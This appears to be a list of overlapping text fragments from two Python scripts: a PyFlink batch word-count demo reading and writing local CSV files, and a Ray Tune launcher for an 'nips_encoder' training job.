"with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\"",
"pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions",
"with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\"",
"import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from",
"expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit",
"exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\"",
"t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word VARCHAR )",
"( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl",
"BIGINT ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output'",
"import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as",
"DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT()))",
"lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env",
"'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table mySink ( word",
"create table mySource ( word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type'",
"= ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input'))",
".select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig()",
"t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word',",
"FileSystem, Schema from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config",
"'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource')",
"\"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if",
".field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait()",
"import expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import",
"tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__': # demo01() demo02()",
".field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv()",
"'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\",
"t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错",
"DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word)",
"logging import os import shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment",
".with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word,",
"BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()))",
"'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl =",
"'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word,",
".with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\",
"import logging import os import shutil import sys import tempfile from pyflink.dataset import",
"DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def",
"StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word VARCHAR ) with (",
"StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') #",
"table mySink ( word VARCHAR, `count` BIGINT ) with ( 'connector' = 'filesystem',",
"ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl =",
".with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING())",
"'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count`",
"# 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word',",
"TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource",
"\"\"\" create table mySink ( word VARCHAR, `count` BIGINT ) with ( 'connector'",
"= 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count)",
"`count` BIGINT ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' =",
".field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab",
"= 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word)",
"ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as expr",
"word VARCHAR, `count` BIGINT ) with ( 'connector' = 'filesystem', 'format.type' = 'csv',",
"TableConfig, DataTypes from pyflink.table import expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem,",
"BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as expr from pyflink.table.descriptors import OldCsv,",
".field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count',",
"( word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path'",
"= TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING()))",
"VARCHAR, `count` BIGINT ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path'",
"tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table",
"= t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__': #",
"from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as expr from",
"'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table mySink (",
"import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env =",
"pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as expr from pyflink.table.descriptors",
"t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\",
") with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' )",
"= TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table",
"pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01(): exec_env =",
") \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait()",
".create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema()",
"t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__': # demo01()",
"TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\",
".select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__': # demo01() demo02() # 跑不起来",
".create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env",
"def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config)",
"DataTypes from pyflink.table import expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema",
"\\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02():",
"import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment()",
"= 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab",
"from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig()",
"\"\"\" create table mySource ( word VARCHAR ) with ( 'connector' = 'filesystem',",
"= 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR,",
"import shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import",
"\\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__': # demo01() demo02() #",
"\\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env =",
"def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config)",
"ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\",
"t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema()",
"t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create",
"'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab =",
"= 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\"",
"DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t')",
"VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input'",
"demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) #",
".field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink')",
"\\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output'))",
"t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ ==",
"my_source_ddl = \"\"\" create table mySource ( word VARCHAR ) with ( 'connector'",
"( word VARCHAR, `count` BIGINT ) with ( 'connector' = 'filesystem', 'format.type' =",
".field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count)",
"exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment",
"= BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word',",
"= \"\"\" create table mySource ( word VARCHAR ) with ( 'connector' =",
".with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\",
"\\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\",
"import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import expressions as expr from pyflink.table.descriptors import",
"'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl)",
"from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01(): exec_env",
"from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes from pyflink.table import",
"# StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word VARCHAR ) with",
"= 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table mySink",
"DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\",
"BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word VARCHAR",
") \"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count` BIGINT",
"expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01():",
"'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table",
"\\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT()))",
"\"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count` BIGINT )",
"lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env,",
"t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1)",
"t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__",
"'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\",
"Schema from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config =",
".field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource')",
"exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv()",
") with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' )",
"t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource (",
"文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())",
"import os import shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment from",
"= ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl",
"DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab =",
"word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' =",
"tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env ="
] |
[
"30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis =",
"cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 **",
"git import ray from ray import tune from ray.tune import CLIReporter from agent0.common.utils",
"\"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch']",
"name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size,",
"2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] )",
"== '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg",
"\"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] >",
"import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__",
"'__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg =",
"2 ** 30, object_store_memory=80 * 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\",",
"sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20",
"object_store_memory=80 * 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\",",
"repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2",
"import ray from ray import tune from ray.tune import CLIReporter from agent0.common.utils import",
"from agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha",
"30, object_store_memory=80 * 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\",",
"** 30, object_store_memory=80 * 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\",",
"cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30)",
"agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__': repo",
"ray.tune import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if",
"repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg =",
"parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True)",
"git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args =",
"import git import ray from ray import tune from ray.tune import CLIReporter from",
"if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long =",
"CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__ ==",
"Config(sha=sha_long) args = parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80",
"** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis",
"= CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer,",
"from ray import tune from ray.tune import CLIReporter from agent0.common.utils import parse_arguments from",
"trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1}, config=vars(cfg),",
"from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer import Trainer, Config if __name__ == '__main__':",
"= repo.git.rev_parse(repo.head.object.hexsha, short=True) sha_long = repo.head.object.hexsha cfg = Config(sha=sha_long) args = parse_arguments(cfg) cfg",
"result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1}, config=vars(cfg), fail_fast=True, reuse_actors=True,",
"stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1},",
"Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30) reporter =",
"* 2 ** 30, object_store_memory=80 * 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\",",
"> cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1}, config=vars(cfg), fail_fast=True, reuse_actors=True, restore=cfg.restore_checkpoint,",
"ray import tune from ray.tune import CLIReporter from agent0.common.utils import parse_arguments from agent0.nips_encoder.trainer",
"Trainer, Config if __name__ == '__main__': repo = git.Repo(search_parent_directories=True) sha = repo.git.rev_parse(repo.head.object.hexsha, short=True)",
"* 2 ** 30) reporter = CLIReporter( metric_columns=[\"game\", \"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"]",
"\"speed\", \"loss\", \"adam_lr\", \"time_remain\", \"time_past\"] ) analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda",
") analysis = tune.run( Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs,",
"Trainer, name='nips_encoder_tune', verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size //",
"parse_arguments(cfg) cfg = Config(**vars(args)) ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 **",
"verbose=1, stop=lambda trial_id, result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\":",
"result: result['epoch'] > cfg.epochs, checkpoint_at_end=True, progress_reporter=reporter, checkpoint_freq=cfg.replay_size // cfg.batch_size, resources_per_trial={\"gpu\": 1}, config=vars(cfg), fail_fast=True,",
